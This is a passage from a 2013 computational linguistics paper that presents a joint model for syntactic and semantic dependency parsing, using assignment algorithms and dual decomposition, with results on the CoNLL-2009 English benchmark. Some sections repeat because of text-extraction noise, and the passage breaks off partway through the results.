Adv. NIPS. 146 work_7jtgrdqc4zeb7lul7vifzjglr4 ---- Transactions of the Association for Computational Linguistics, 1 (2013) 219–230. Action Editor: Brian Roark. Submitted 1/2013; Revised 3/2013; Published 5/2013. c©2013 Association for Computational Linguistics. Joint Arc-factored Parsing of Syntactic and Semantic Dependencies Xavier Lluı́s and Xavier Carreras and Lluı́s Màrquez TALP Research Center Universitat Politècnica de Catalunya Jordi Girona 1–3, 08034 Barcelona {xlluis,carreras,lluism}@lsi.upc.edu Abstract In this paper we introduce a joint arc-factored model for syntactic and semantic dependency parsing. The semantic role labeler predicts the full syntactic paths that connect predicates with their arguments. This process is framed as a linear assignment task, which allows to control some well-formedness constraints. For the syntactic part, we define a standard arc-factored dependency model that predicts the full syntactic tree. Finally, we employ dual decomposition techniques to produce consis- tent syntactic and predicate-argument struc- tures while searching over a large space of syntactic configurations. In experiments on the CoNLL-2009 English benchmark we ob- serve very competitive results. 1 Introduction Semantic role labeling (SRL) is the task of identi- fying the arguments of lexical predicates in a sen- tence and labeling them with semantic roles (Gildea and Jurafsky, 2002; Màrquez et al., 2008). SRL is an important shallow semantic task in NLP since predicate-argument relations directly represent se- mantic properties of the type “who” did “what” to “whom”, “how”, and “why” for events expressed by predicates (typically verbs and nouns). Predicate-argument relations are strongly related to the syntactic structure of the sentence: the ma- jority of predicate arguments correspond to some syntactic constituent, and the syntactic structure that connects an argument with the predicate is a strong indicator of its semantic role. Actually, semantic roles represent an abstraction of the syntactic form of a predicative event. While syntactic functions of arguments change with the form of the event (e.g., active vs. passive forms), the semantic roles of argu- ments remain invariant to their syntactic realization. Consequently, since the first works, SRL systems have assumed access to the syntactic structure of the sentence (Gildea and Jurafsky, 2002; Carreras and Màrquez, 2005). A simple approach is to obtain the parse trees as a pre-process to the SRL system, which allows the use of unrestricted features of the syntax. However, as in other pipeline approaches in NLP, it has been shown that the errors of the syn- tactic parser severely degrade the predictions of the SRL model (Gildea and Palmer, 2002). A common approach to alleviate this problem is to work with multiple alternative syntactic trees and let the SRL system optimize over any input tree or part of it (Toutanova et al., 2008; Punyakanok et al., 2008). As a step further, more recent work has proposed parsing models that predict syntactic structure aug- mented with semantic predicate-argument relations (Surdeanu et al., 2008; Hajič et al., 2009; Johansson, 2009; Titov et al., 2009; Lluı́s et al., 2009), which is the focus of this paper. These joint models should favor the syntactic structure that is most consistent with the semantic predicate-argument structures of a sentence. In principle, these models can exploit syntactic and semantic features simultaneously, and could potentially improve the accuracy for both syn- tactic and semantic relations. One difficulty in the design of joint syntactic- semantic parsing models is that there exist impor- tant structural divergences between the two layers. 219 Mary loves to play guitar . � SBJ OPRD IM OBJ P ARG0 ARG1 ARG0 ARG1 Figure 1: An example . . . Das et al. (2012) . . . Riedel and McCallum (2011) . . . 3 A Syntactic-Semantic Dependency Model We will describe structures of syntactic and seman- tic dependencies with vectors of binary variables. We will denote by yh,m,l a syntactic dependency from head token h to dependant token m labeled with syntactic function l. Similarly we will denote by zp,a,r a semantic dependency between predicate token p and argument token a labeled with seman- tic role r. We will use y and z to denote vectors of binary variables indexed by syntactic and semantic dependencies, respectively. A joint model for syntactic and semantic depen- dency parsing could be defined as: argmax y,z s syn(x, y) + s srl(x, z, y) . In the equation, s syn(x, y) gives a score for the syntactic tree y. In the literature, it is standard to use arc-factored models defined as s syn(x, y) = � yh,m,l=1 s syn(x, h, m, l) , where we overload s syn to be a function that computes scores for individual labeled syntactic dependencies. In discriminative models one has s syn(x, h, m, l) = wsyn · fsyn(x, h, m, l), where fsyn is a feature vector for the syntactic dependency and wsyn is a vector of parameters (McDonald et al., 2005). The other term, s srl(x, z, y), gives a score for a semantic dependency structure using the syntactic structure y as features. Previous work has empiri- cally proved the importance of exploiting syntactic features in the semantic component (Gildea and Ju- rafsky, 2002; Xue and Palmer, 2004; Punyakanok et al., 2008). However, without further assumptions, this property makes the optimization problem com- putationally hard. One simple approximation is to use a pipeline model: first compute the optimal syn- tactic tree, and then optimize for the best semantic structure given the syntactic tree. In the rest of the paper we describe a method that searches over syn- tactic and semantic dependency structures jointly. We first impose the assumption that syntactic fea- tures of the semantic component are restricted to the syntactic path between a predicate and an argument, following previous work (Johansson, 2009). For- mally, for a predicate p, argument a and role r we will define a vector of dependency indicators πp,a,r similar to the ones above: πp,a,rh,m,l indicates if a de- pendency �h, m, l� is part of the syntactic path that links predicate p with token a. Figure 1 gives an ex- ample of one such paths. Given full syntactic and semantic structures y and z it is trivial to construct a vector π that is a concatenation of vectors πp,a,r for all �p, a, r� in z. We can now define a linear seman- tic model as s srl(x, z, π) = � zp,a,r=1 s srl(x, p, a, r, πp,a,r) , (1) where s srl computes a score for a semantic de- pendency �p, a, r� together with its syntactic path πp,a,r. As in the syntactic component, this function is typically defined as a linear function over a set of features of the semantic dependency and its path. With this joint model, the inference problem can be formulated as: argmax y,z,π s syn(x, y) + s srl(x, z, π) (2) subject to cTree : y is a valid dependency tree cRole : ∀p, r : � a zp,a,r ≤ 1 cArg : ∀p, a : � r zp,a,r ≤ 1 cPath : ∀p, a, r : if zp,a,r = 1 then πp,a,r is a path from p to a otherwise πp,a,r = 0 cSubtree : ∀p, r, a : πp,r,a is a subtree of y Figure 1: A sentence with syntactic dependencies (top) and semantic dependencies for the predicates “loves” and “play” (bottom). The thick arcs illustrate a structural di- vergence where the argument “Mary” is linked to “play” with a path involving three syntactic dependencies. This is clearly seen in dependency-based representa- tions of syntax and semantic roles (Surdeanu et al., 2008), such as in the example in Figure 1: the con- struct “loves to” causes the argument “Mary” to be syntactically distant from the predicate “play”. Lin- guistic phenomena such as auxiliary verbs, control and raising, typically result in syntactic structures where semantic arguments are not among the direct dependants of their predicate —e.g., about 25% of arguments are distant in the English development set of the CoNLL-2009 shared task. Besides, standard models for dependency parsing crucially depend on arc factorizations of the dependency structure (Mc- Donald et al., 2005; Nivre and Nilsson, 2005), other- wise their computational properties break. Hence, it is challenging to define efficient methods for syntac- tic and semantic dependency parsing that can exploit features of both layers simultaneously. In this paper we propose a method for this joint task. In our method we define predicate-centric seman- tic models that, rather than predicting just the ar- gument that realizes each semantic role, they pre- dict the full syntactic path that connects the predi- cate with the argument. We show how efficient pre- dictions with these models can be made using as- signment algorithms in bipartite graphs. Simulta- neously, we use a standard arc-factored dependency model that predicts the full syntactic tree of the sen- tence. Finally, we employ dual decomposition tech- niques (Koo et al., 2010; Rush et al., 2010; Sontag et al., 2010) to find agreement between the full de- pendency tree and the partial syntactic trees linking each predicate with its arguments. In summary, the main contributions of this paper are: • We frame SRL as a weighted assignment prob- lem in a bipartite graph. Under this framework we can control assignment constraints between roles and arguments. Key to our method, we can efficiently search over a large space of syn- tactic realizations of semantic arguments. • We solve joint inference of syntactic and se- mantic dependencies with a dual decomposi- tion method, similar to that of Koo et al. (2010). Our system produces consistent syntactic and predicate-argument structures while searching over a large space of syntactic configurations. In the experimental section we compare joint and pipeline models. The final results of our joint syntactic-semantic system are competitive with the state-of-the-art and improve over the best results published by a joint method on the CoNLL-2009 English dataset. 2 A Syntactic-Semantic Dependency Model We first describe how we represent structures of syn- tactic and semantic dependencies like the one in Fig- ure 1. Throughout the paper, we will assume a fixed input sentence x with n tokens where lexical predi- cates are marked. We will also assume fixed sets of syntactic functions Rsyn and semantic roles Rsem. We will represent depencency structures using vec- tors of binary variables. A variable yh,m,l will in- dicate the presence of a syntactic dependency from head token h to dependant token m labeled with syn- tactic function l. Then, a syntactic tree will be de- noted as a vector y of variables indexed by syntactic dependencies. Similarly, a variable zp,a,r will indi- cate the presence of a semantic dependency between predicate token p and argument token a labeled with semantic role r. We will represent a semantic role structure as a vector z indexed by semantic depen- dencies. Whenever we enumerate syntactic depen- dencies 〈h,m,l〉 we will assume that they are in the valid range for x, i.e. 0 ≤ h ≤ n, 1 ≤ m ≤ n, h 6= m and l ∈ Rsyn, where h = 0 stands for a special root token. Similarly, for semantic depen- dencies 〈p,a,r〉 we will assume that p points to a predicate of x, 1 ≤ a ≤ n and r ∈Rsem. 220 A joint model for syntactic and semantic depen- dency parsing could be defined as: argmax y,z s syn(x,y) + s srl(x,z,y) . (1) In the equation, s syn(x,y) gives a score for the syntactic tree y. In the literature, it is standard to use arc-factored models defined as s syn(x,y) = ∑ yh,m,l=1 s syn(x,h,m,l) , (2) where we overload s syn to be a function that computes scores for individual syntactic depen- dencies. In linear discriminative models one has s syn(x,h,m,l) = wsyn · fsyn(x,h,m,l), where fsyn is a feature vector for a syntactic dependency and wsyn is a vector of parameters (McDonald et al., 2005). In Section 6 we describe how we trained score functions with discriminative methods. The other term in Eq. 1, s srl(x,z,y), gives a score for a semantic dependency structure z using features of the syntactic structure y. Previous work has empirically proved the importance of exploit- ing syntactic features in the semantic component (Gildea and Jurafsky, 2002; Xue and Palmer, 2004; Punyakanok et al., 2008). However, without further assumptions, this property makes the optimization problem computationally hard. One simple approx- imation is to use a pipeline model: first compute the optimal syntactic tree y, and then optimize for the best semantic structure z given y. In the rest of the paper we describe a method that searches over syn- tactic and semantic dependency structures jointly. We first note that for a fixed semantic dependency, the semantic component will typically restrict the syntactic features representing the dependency to a specific subtree of y. For example, previous work has restricted such features to the syntactic path that links a predicate with an argument (Moschitti, 2004; Johansson, 2009), and in this paper we employ this restriction. Figure 1 gives an example of a sub- tree, where we highlight the syntactic path that con- nects the semantic dependency between “play” and “Mary” with role ARG0. Formally, for a predicate p, argument a and role r we define a local syntactic subtree πp,a,r repre- sented as a vector: πp,a,rh,m,l indicates if a dependency 〈h,m,l〉 is part of the syntactic path that links pred- icate p with token a and role r.1 Given full syntactic and semantic structures y and z it is trivial to con- struct a vector π that concatenates vectors πp,a,r for all 〈p,a,r〉 in z. The semantic model becomes s srl(x,z,π) = ∑ zp,a,r=1 s srl(x,p,a,r,πp,a,r) , (3) where s srl computes a score for a semantic de- pendency 〈p,a,r〉 together with its syntactic path πp,a,r. As in the syntactic component, this function is typically defined as a linear function over a set of features of the semantic dependency and its path. The inference problem of our joint model is: argmax y,z,π s syn(x,y) + s srl(x,z,π) (4) subject to cTree : y is a valid dependency tree cRole : ∀p,r : ∑ a zp,a,r ≤ 1 cArg : ∀p,a : ∑ r zp,a,r ≤ 1 cPath : ∀p,a,r : if zp,a,r = 1 then πp,a,r is a path from p to a, otherwise πp,a,r = 0 cSubtree : ∀p,a,r : πp,a,r is a subtree of y Constraint cTree dictates that y is a valid depen- dency tree; see (Martins et al., 2009) for a detailed specification. The next two sets of constraints con- cern the semantic structure only. cRole imposes that each semantic role is realized at most once.2 Con- versely, cArg dictates that an argument can realize at most one semantic role in a predicate. The final two sets of constraints model the syntactic-semantic interdependencies. cPath imposes that each πp,a,r represents a syntactic path between p and a when- ever there exists a semantic relation. Finally, cSub- tree imposes that the paths in π are consistent with the full syntactic structure, i.e. they are subtrees. 1In this paper we say that structures πp,a,r are paths from predicates to arguments, but they could be more general sub- trees. The condition to build a joint system is that these subtrees must be parseable in the way we describe in Section 3.1. 2In general a semantic role can be realized with more than one argument, though it is rare. It is not hard to modify our framework to allow for a maximum number of occurrences of a semantic role. 221 In Section 3 we define a process that optimizes the semantic structure ignoring constraint cSubtree. Then in Section 4 we describe a dual decomposition method that uses the first process repeatedly to solve the joint problem. 3 SRL as Assignment In this section we frame the problem of finding se- mantic dependencies as a linear assignment task. The problem we optimize is: argmax z,π s srl(x,z,π) (5) subject to cRole, cArg, cPath In this case we dropped the full syntactic structure y from the optimization in Eq. 4, as well as the corresponding constraints cTree and cSubtree. As a consequence, we note that the syntactic paths π are not tied to any consistency constraint other than each of the paths being a well-formed sequence of dependencies linking the predicate to the argument. In other words, the optimal solution in this case does not guarantee that the set of paths from a predicate to all of its arguments satisfies tree constraints. We first describe how these paths can be optimized locally. Then we show how to find a solution z satisfying cRole and cArg using an assignment algorithm. 3.1 Local Optimization of Syntactic Paths Let ẑ and π̂ be the optimal values of Eq. 5. For any 〈p,a,r〉, let π̃p,a,r = argmax πp,a,r s srl(x,p,a,r,πp,a,r) . (6) For any 〈p,a,r〉 such that ẑp,a,r = 1 it has to be that π̂p,a,r = π̃p,a,r. If this was not true, replacing π̂p,a,r with π̃p,a,r would improve the objective of Eq. 5 without violating the constraints, thus contradicting the hypothesis about optimality of π̂. Therefore, for each 〈p,a,r〉 we can optimize its best syntactic path locally as defined in Eq. 6. In this paper, we will assume access to a list of likely syntactic paths for each predicate p and argu- ment candidate a, such that the optimization in Eq. 6 can be solved explicitly by looping over each path in the list. The main advantage of this method is that, since paths are precomputed, our model can make unrestricted use of syntactic path features. (1) Mary (2) plays (3) guitar (4) NULL (5) NULL (6) NULL (1) ARG0 (2) ARG1 (3) ARG2 (4) NULL (5) NULL (6) NULL W1,1 W4,2W2,3 W3,4 W5,5 W6,6W1,1 W4,2W2,3 W3,4 W5,5 W6,6W1,1 W4,2W2,3 W3,4 W5,5 W6,6W1,1 W4,2W2,3 W3,4 W5,5 W6,6W1,1 W4,2W2,3 W3,4 W5,5 W6,6W1,1 W4,2W2,3 W3,4 W5,5 W6,6 Figure 2: Illustration of the assignment graph for the sen- tence “Mary plays guitar”, where the predicate “plays” can have up to three roles: ARG0 (agent), ARG1 (theme) and ARG2 (benefactor). Nodes labeled NULL represent a null role or token. Highlighted edges are the correct assignment. It is simple to employ a probabilistic syntactic de- pendency model to create the list of likely paths for each predicate-argument pair. In the experiments we explore this approach and show that with an average of 44 paths per predicate we can recover 86.2% of the correct paths. We leave for future work the development of ef- ficient methods to recover the most likely syntactic structure linking an argument with its predicate. 3.2 The Assignment Algorithm Coming back to solving Eq. 5, it is easy to see that an optimal solution satisfying constraints cRole and cArg can be found with a linear assignment algorithm. The process we describe determines the predicate-argument relations separately for each predicate. Assume a bipartite graph of size N with role nodes r1 . . .rN on one side and argument nodes a1 . . .aN on the other side. Assume also a matrix of non-negative scores Wi,j corresponding to assigning argument aj to role ri. A linear assignment algo- rithm finds a bijection f : i → j from roles to argu- ments that maximizes ∑N i=1 Wi,f(i). The Hungarian algorithm finds the exact solution to this problem in O(N3) time (Kuhn, 1955; Burkard et al., 2009). All that is left is to construct a bipartite graph rep- resenting predicate roles and sentence tokens, such that some roles and tokens can be left unassigned, which is a common setting for assignment tasks. Al- gorithm 1 describes a procedure for constructing a weighted bipartite graph for SRL, and Figure 2 il- lustrates an example of a bipartite graph. We then 222 Algorithm 1 Construction of an Assignment Graph for Semantic Role Labeling Let p be a predicate with k possible roles. Let n be the number of argument candidates in the sentence. This al- gorithm creates a bipartite graph with N = n+k vertices on each side. 1. Create role vertices ri for i = 1 . . .N, where • for 1 ≤ i ≤ k, ri is the i-th role, • for 1 ≤ i ≤ n, rk+i is a special NULL role. 2. Create argument vertices aj for j = 1 . . .N, where • for 1 ≤ j ≤ n, aj is the j-th argument candidate, • for 1 ≤ j ≤ k, an+j is a special NULL argument. 3. Define a matrix of model scores S ∈ R(k+1)×n: (a) Optimization of syntactic paths: For 1 ≤ i ≤ k, 1 ≤ j ≤ n Si,j = max π p,aj ,ri s srl(x,p,aj,ri,π p,aj,ri ) (b) Scores of NULL assignments3: For 1 ≤ j ≤ n Sk+1,j = 0 4. Let S0 = mini,j Si,j , the minimum of any score in S. Define a matrix of non-negative scores W ∈ RN×N as follows: (a) for 1 ≤ i ≤ k, 1 ≤ j ≤ n Wi,j = Si,j −S0 (b) for k < i ≤ N, 1 ≤ j ≤ n Wi,j = Sk+1,j −S0 (c) for 1 < i ≤ N, n < j ≤ N Wi,j = 0 run the Hungarian algorithm on the weighted graph and obtain a bijection f : ri → aj, from which it is trivial to recover the optimal solution of Eq. 5. Finally, we note that it is simple to allow for multi- ple instances of a semantic role by adding more role nodes in step 1; it would be straightforward to add penalties in step 3 for multiple instances of roles. 4 A Dual Decomposition Algorithm We now present a dual decomposition method to op- timize Eq. 4, that uses the assignment algorithm pre- sented above as a subroutine. Our method is sim- ilar to that of Koo et al. (2010), in the sense that 3In our model we fix the score of null assignments to 0. It is straightforward to compute a discriminative score instead. our joint optimization can be decomposed into two sub-problems that need to agree on the syntactic dependencies they predict. For a detailed descrip- tion of dual decomposition methods applied to NLP see (Sontag et al., 2010; Rush et al., 2010). We note that in Eq. 4 the constraint cSubtree ties the syntactic and semantic structures, imposing that any path πp,a,r that links a predicate p with an argu- ment a must be a subtree of the full syntactic struc- ture y. Formally the set of constraints is: yh,m,l ≥ πp,a,rh,m,l ∀ p,a,r,h,m,l . These constraints can be compactly written as c ·yh,m,l ≥ ∑ p,a,r π p,a,r h,m,l ∀ h,m,l , where c is a constant equal to the number of dis- tinct semantic dependencies 〈p,a,r〉. In addition, we can introduce a vector non-negative slack vari- ables ξ with a component for each syntactic depen- dency ξh,m,l, turning the constraints into: c ·yh,m,l − ∑ p,a,r π p,a,r h,m,l − ξh,m,l = 0 ∀ h,m,l We can now rewrite Eq. 4 as: argmax y,z,π,ξ≥0 s syn(x,y) + s srl(x,z,π) (7) subject to cTree, cRole, cArg, cPath ∀h,m,l : c ·yh,m,l − ∑ p,a,r π p,a,r h,m,l − ξh,m,l = 0 As in Koo et al. (2010), we will relax subtree cons- traints by introducing a vector of Lagrange multipli- ers λ indexed by syntactic dependencies, i.e. each coordinate λh,m,l is a Lagrange multiplier for the constraint associated with 〈h,m,l〉. The Lagrangian of the problem is: L(y,z,π,ξ,λ)= s syn(x,y) + s srl(x,z,π) + λ · ( c ·y − ∑ p,a,r πp,a,r −ξ ) (8) We can now formulate Eq. 7 as: max y,z,π,ξ≥0 s.t. cTree,cRole,cArg,cPath c·y− ∑ p,a,r π p,a,r−ξ=0 L(y,z,π,ξ,λ) (9) 223 This optimization problem has the property that its optimum value is the same as the optimum of Eq. 7 for any value of λ. This is because whenever the constraints are satisfied, the terms in the Lagrangian involving λ are zero. If we remove the subtree con- straints from Eq. 9 we obtain the dual objective: D(λ) = max y,z,π,ξ≥0 s.t. cTree,cRole,cArg,cPath L(y,z,π,ξ,λ) (10) = max y s.t. cTree ( s syn(x,y) + c ·y ·λ ) + max z,π s.t. cRole,cArg,cPath ( s srl(x,z,π) −λ · ∑ p,a,r πp,a,r ) + max ξ≥0 (−λ ·ξ) (11) The dual objective is an upper bound to the opti- mal value of primal objective of Eq. 7. Thus, we are interested in finding the minimum of the dual in order to tighten the upper-bound. We will solve min λ D(λ) (12) using a subgradient method. Algorithm 2 presents pseudo-code. The algorithm takes advantage of the decomposed form of the dual in Eq. 11, where we have rewritten the Lagrangian such that syntac- tic and semantic structures appear in separate terms. This will allow to compute subgradients efficiently. In particular, the subgradient of D at a point λ is: ∆(λ) = c · ŷ − ∑ p,a,r π̂p,a,r − ξ̂ (13) where ŷ = argmax y s.t. cTree ( s syn(x,y) + c ·y ·λ ) (14) ẑ,π̂ = argmax z,π s.t. cRole,cArg,cPath s srl(x,z,π) −λ· ∑ p,a,r πp,a,r (15) ξ̂ = argmax ξ≥0 −λ ·ξ (16) Whenever π̂ is consistent with ŷ the subgradient will be zero and the method will converge. When paths π̂ contain a dependency 〈h,m,l〉 that is in- consistent with ŷ, the associated dual λh,m,l will in- crease, hence lowering the score of all paths that use 〈h,m,l〉 at the next iteration; at same time, the to- tal score for that dependency will increase, favoring syntactic dependency structures alternative to ŷ. As Algorithm 2 A dual-decomposition algorithm for syntactic-semantic dependency parsing Input: x, a sentence; T , number of iterations; Output: syntactic and semantic structures ŷ and ẑ Notation: we use cSem= cRole ∧ cArg ∧ cPath 1: λ1 = 0 # initialize dual variables 2: c =number of distinct 〈h,m,l〉 in x 3: for t = 1 . . .T do 4: ŷ = argmaxy s.t. cTree ( s syn(x,y) + c ·λt ·y ) 5: ẑ,π̂ = argmax z,π s.t. cSem ( s srl(x,z,π) −λt · ∑ p,a,r π p,a,r ) 6: λt+1 = λt # dual variables for the next iteration 7: Set αt, the step size of the current iteration 8: for each 〈h,m,l〉 do 9: q = ∑ p,a,r π̂ p,a,r h,m,l # num. paths using 〈h,m,l〉 10: if q > 0 and ŷh,m,l = 0 then 11: λt+1h,m,l = λ t+1 h,m,l + αtq 12: break if λt+1 = λt # convergence 13: return ŷ, ẑ in previous work, in the algorithm a parameter αt controls the size of subgradient steps at iteration t. The key point of the method is that solutions to Eq. 14 and 15 can be computed efficiently using sep- arate processes. In particular, Eq. 14 corresponds to a standard dependency parsing problem, where for each dependency 〈h,m,l〉 we have an additional score term c·λh,m,l —in our experiments we use the projected dependency parsing algorithm by (Eisner, 2000). To calculate Eq. 15 we use the assignment method described in Section 3, where it is straight- forward to introduce additional score terms −λh,m,l to every factor πp,a,rh,m,l. It can be shown that whenever the subgradient method converges, the solutions ŷ and ẑ are the optimal solutions to our original prob- lem in Eq. 4 (see (Koo et al., 2010) for a justifi- cation). In practice we run the subgradient method for a maximum number of iterations, and return the solutions of the last iteration if it does not converge. 5 Related Work Recently, there have been a number of approaches to joint parsing of syntactic and semantic dependen- cies, partly because of the availability of treebanks in this format popularized by the CoNLL shared tasks (Surdeanu et al., 2008; Hajič et al., 2009). Like in our method, Johansson (2009) defined a model that exploits features of a semantic depen- 224 dency together with the syntactic path connecting the predicate and the argument. That method uses an approximate parsing algorithm that employs k-best inference and beam search. Similarly, Lluı́s et al. (2009) defined a joint model that forces the predi- cate structure to be represented in the syntactic de- pendency tree, by enriching arcs with semantic in- formation. The semantic component uses features of pre-computed syntactic structures that may diverge from the joint structure. In contrast, our joint pars- ing method is exact whenever the dual decomposi- tion algorithm converges. Titov et al. (2009) augmented a transition-based dependency parser with operations that produce synchronous derivations of syntactic and semantic structures. Instead of explicitly representing seman- tic dependencies together with a syntactic path, they induce latent representations of the interactions be- tween syntactic and semantic layers. In all works mentioned the model has no con- trol of assignment constraints that disallow label- ing multiple arguments with the same semantic role. Punyakanok et al. (2008) first introduced a system that explicitly controls these constraints, as well as other constraints that look at pairwise assignments which we can not model. They solve SRL using general-purpose Integer Linear Programming (ILP) methods. In similar spirit, Riedel and McCallum (2011) presented a model for extracting structured events that controls interactions between predicate- argument assignments. They take into account pair- wise assignments and solve the optimization prob- lem with dual decomposition. More recently, Das et al. (2012) proposed a dual decomposition method that deals with several assignment constraints for predicate-argument relations. Their method is an alternative to general ILP methods. To our knowl- edge, our work is the first that frames SRL as a linear assignment task, for which simple and exact algo- rithms exist. We should note that these works model predicate-argument relations with assignment con- straints, but none of them predicts the underlying syntactic structure. Our dual decomposition method follows from that of Koo et al. (2010). In both cases two separate pro- cesses predict syntactic dependency structures, and the dual decomposition algorithm seeks agreement at the level of individual dependencies. One dif- ference is that our semantic process predicts partial syntax (restricted to syntactic paths connecting pred- icates and arguments), while in their case each of the two processes predicts the full set of dependencies. 6 Experiments We present experiments using our syntactic- semantic parser on the CoNLL-2009 Shared Task English benchmark (Hajič et al., 2009). It consists of the usual WSJ training/development/test sections mapped to dependency trees, augmented with se- mantic predicate-argument relations from PropBank (Palmer et al., 2005) and NomBank (Meyers et al., 2004) also represented as dependencies. It also con- tains a PropBanked portion of the Brown corpus as an out-of-domain test set. Our goal was to evaluate the contributions of pars- ing algorithms in the following configurations: Base Pipeline Runs a syntactic parser and then runs an SRL parser constrained to paths of the best syntactic tree. In the SRL it only enforces con- straint cArg, by simply classifying the candi- date argument in each path into one of the pos- sible semantic roles or as NULL. Pipeline with Assignment Runs the assignment al- gorithm for SRL, enforcing constraints cRole and cArg, but constrained to paths of the best syntactic tree. Forest Runs the assignment algorithm for SRL on a large set of precomputed syntactic paths, de- scribed below. This configuration corresponds to running Dual Decomposition for a single it- eration, and is not guaranteed to predict consis- tent syntactic and semantic structures. Dual Decomposition (DD) Runs dual decomposi- tion using the assignment algorithm on the set of precomputed paths. Syntactic and semantic structures are consistent when it reaches con- vergence. All four systems used the same type of discrimina- tive scorers and features. Next we provide details about these systems. Then we present the results. 6.1 Implementation Syntactic model We used two discriminative arc- factored models for labeled dependency parsing: a 225 first-order model, and a second-order model with grandchildren interactions, both reimplementations of the parsers by McDonald et al. (2005) and Car- reras (2007) respectively. In both cases we used projective dependency parsing algorithms based on (Eisner, 2000).4 To learn the models, we used a log-linear loss function following Koo et al. (2007), which trains probabilistic discriminative parsers. At test time, we used the probabilistic parsers to compute marginal probabilities p(h,m,l | x), us- ing inside-outside algorithms for first/second-order models. Hence, for either of the parsing models, we always obtain a table of first-order marginal scores, with one score per labeled dependency. Then we run first-order inference with these marginals to ob- tain the best tree. We found that the higher-order parser performed equally well on development us- ing this method as using second-order inference to predict trees: since we run the parser multiple times within Dual Decomposition, our strategy results in faster parsing times. Precomputed Paths Both Forest and Dual De- composition run assignment on a set of precomputed paths, and here we explain how we build it. We first observed that 98.4% of the correct arguments in de- velopment data are either direct descendants of the predicate, direct descendants of an ancestor of the predicate, or an ancestor of the predicate.5 All meth- ods we test are restricted to this syntactic scope. To generate a list of paths, we did as follows: • Calculate marginals of unlabeled dependencies using the first-order parser: p(h,m | x) =∑ l p(h,m,l | x). Note that for each m, the probabilities p(h,m|x) for all h form a distri- bution (i.e. they sum to one). Then, for each m, keep the most-likely dependencies that cover at least 90% of the mass, and prune the rest. • Starting from a predicate p, generate a path by taking any number of dependencies that as- cend, and optionally adding one dependency that descends. We constrained paths to be pro- jective, and to have a maximum number of 6 4Our method allows to use non-projective dependency pars- ing methods seamlessly. 5This is specific to CoNLL-2009 data for English. In gen- eral, for other languages the coverage of these rules may be lower. We leave this question to future work. ascendant dependencies. • Label each unlabeled edge 〈h,m〉 in the paths with l = argmaxl p(h,m,l | x). On development data, this procedure generated an average of 43.8 paths per predicate that cover 86.2% of the correct paths. In contrast, enumerating paths of the single-best tree covers 79.4% of correct paths for the first-order parser, and 82.2% for the second- order parser.6 SRL model We used a discriminative model with similar features to those in the system of Johansson (2009). In addition, we included the following: • Unigram/bigram/trigram path features. For all n-grams in the syntactic path, patterns of words and POS tags (e.g., mary+loves+to, mary+VB+to). • Voice features. The predicate voice together with the word/POS of the argument (e.g., pas- sive+mary). • Path continuity. Count of non-consecutive to- kens in a predicate-argument path. To train SRL models we used the averaged per- ceptron (Collins, 2002). For the base pipeline we trained standard SRL classifiers. For the rest of models we used the structured Perceptron running the assignment algorithm as inference routine. In this case, we generated a large set of syntactic paths for training using the procedure described above, and we set the loss function to penalize mistakes in predicting the semantic role of arguments and their syntactic path. Dual Decomposition We added a parameter β weighting the syntactic and semantic components of the model as follows: (1 −β) s syn(x,y) + β s srl(x,z,π) . As syntactic scores we used normalized marginal probabilities of dependencies, either from the first or the higher-order parser. The scores of all factors of the SRL model were normalized at every sen- tence to be between -1 and 1. The rest of details 6One can evaluate the maximum recall on correct arguments that can be obtained, irrespective of whether the syntactic path is correct: for the set of paths it is 98.3%, while for single-best trees it is 91.9% and 92.7% for first and second-order models. 226 o LAS UAS semp semr semF1 sempp Pipeline 1 85.32 88.86 86.23 67.67 75.83 45.64 w. Assig. 1 85.32 88.86 84.08 71.82 77.47 51.17 Forest - - - 80.67 73.60 76.97 51.33 Pipeline 2 87.77 90.96 87.07 68.65 76.77 47.07 w. Assig. 2 87.77 90.96 85.21 73.41 78.87 53.80 Table 1: Results on development for the baseline and as- signment pipelines, running first and second-order syn- tactic parsers, and the Forest method. o indicates the or- der of syntactic inference. of the method were implemented following Koo et al. (2010), including the strategy for decreasing the step size αt. We ran the algorithm for up to 500 it- erations, with initial step size of 0.001. 6.2 Results To evaluate syntactic dependencies we use unla- beled attachment score (UAS), i.e., the percentage of words with the correct head, and labeled attach- ment scores (LAS), i.e., the percentage of words with the correct head and syntactic label. Semantic predicate-argument relations are evaluated with pre- cision (semp), recall (semr) and F1 measure (semF1 ) at the level of labeled semantic dependencies. In ad- dition, we measure the percentage of perfectly pre- dicted predicate structures (sempp).7 Table 1 shows the results on the development set for our three first methods. We can see that the pipeline methods running assignment improve over the baseline pipelines in semantic F1 by about 2 points, due to the application of the cRole constraint. The Forest method also shows an improvement in recall of semantic roles with respect to the pipeline methods. Presumably, the set of paths available in the Forest model allows to recognize a higher num- ber of arguments at an expense of a lower preci- sion. Regarding the percentage of perfect predicate- argument structures there is a remarkable improve- ment in the systems that apply the full set of con- 7Our evaluation metrics differ slightly from the official met- ric at CoNLL-2009. That metric considers predicate senses as special semantic dependencies and, thus, it includes them in the calculation of the evaluation metrics. In this paper, we are not addressing predicate sense disambiguation and, conse- quently, we ignore predicate senses when presenting evaluation results. When we report the performance of CoNLL systems, their scores will be noticeably lower than the scores reported at the shared task. This is because predicate disambiguation is a reasonably simple task with a very high baseline around 90%. o β LAS UAS semp semr semF1 sempp %conv 1 0.1 85.32 88.86 84.09 71.84 77.48 51.77 100 1 0.4 85.36 88.91 84.07 71.94 77.53 51.85 100 1 0.5 85.38 88.93 84.08 72.03 77.59 51.96 100 1 0.6 85.41 88.95 84.05 72.19 77.67 52.03 99.8 1 0.7 85.44 89.00 84.10 72.42 77.82 52.24 99.7 1 0.8 85.48 89.02 83.99 72.69 77.94 52.57 99.5 1 0.9 85.39 88.93 83.68 72.82 77.88 52.49 99.8 2 0.1 87.78 90.96 85.20 73.11 78.69 53.74 100 2 0.4 87.78 90.96 85.21 73.12 78.70 53.74 100 2 0.5 87.78 90.96 85.19 73.12 78.70 53.72 100 2 0.6 87.78 90.96 85.20 73.13 78.70 53.72 99.9 2 0.7 87.78 90.96 85.19 73.13 78.70 53.72 99.8 2 0.8 87.80 90.98 85.20 73.18 78.74 53.77 99.8 2 0.9 87.84 91.02 85.20 73.23 78.76 53.82 100 Table 2: Results of the dual decomposition method on development data, for different values of the β parame- ter. o is the order of the syntactic parser. %conv is the percentage of examples that converged. straints using the assignment algorithm. We believe that the cRole constraint that ensures no repeated roles for a given predicate is a key factor to predict the full set of arguments of a predicate. The Forest configuration is the starting point to run the dual decomposition algorithm. We ran ex- periments for various values of the β parameter. Ta- ble 2 shows the results. We see that as we increase β, the SRL component has more relative weight, and the syntactic structure changes. The DD methods are always able to improve over the 